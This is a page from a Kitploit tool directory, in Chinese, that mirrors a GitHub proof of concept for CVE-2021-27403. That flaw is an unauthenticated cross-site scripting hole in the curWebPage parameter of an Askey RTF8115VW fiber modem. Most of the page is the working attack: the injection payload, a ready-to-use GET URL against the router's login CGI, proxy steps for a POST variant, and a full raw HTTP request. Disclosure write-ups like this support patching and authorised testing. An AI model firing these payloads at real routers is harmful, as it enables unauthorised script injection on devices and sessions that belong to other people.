Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-27403 — XSS-Askey | Kitploit
工具/GitHubGitHub/bokanrb/cve-2021-27403
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubbokanrb/cve-2021-27403

CVE-2021-27403

XSS-Askey

查看仓库
135年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

未认证的跨站脚本 – Askey互联网光纤调制解调器

厂商:Askey
软件版本:BR_SV_g11.11_RTF_TEF001_V6.54_V014
型号:RTF8115VW
漏洞参数:curWebPage
Payload:";alert('xss')//
未在其他型号/版本中测试。

通过GET请求

root@kitploit:~
在登录请求中,我们可以发起一个GET请求:
http://x.x.x.x/cgi-bin/te_acceso_router.cgi?curWebPage=/settings-internet.asp";alert('xss')//&loginUsername=admin&loginPassword=admin

Username和Password参数无需有效。

Alt text

通过POST请求

root@kitploit:~
1) 设置代理(Burp/ZAP/任意工具)以拦截登录请求
2) 在curWebPage参数使用的.asp页面之后输入payload
3) 转发该请求

最终请求

root@kitploit:~
POST /cgi-bin/te_acceso_router.cgi HTTP/1.1
Host: x.x.x.x
Origin: http://x.x.x.x
Cookie: _httpdSessionId_=ece9eb5b733f7cbc8198ce9b6ab995c2
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/login.asp
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
Content-Length: 35

curWebPage=%2Fsettings-firewall.asp+payload
 <!---curWebPage=%2Fsettings-firewall.asp";alert('xss')//--->
下载工具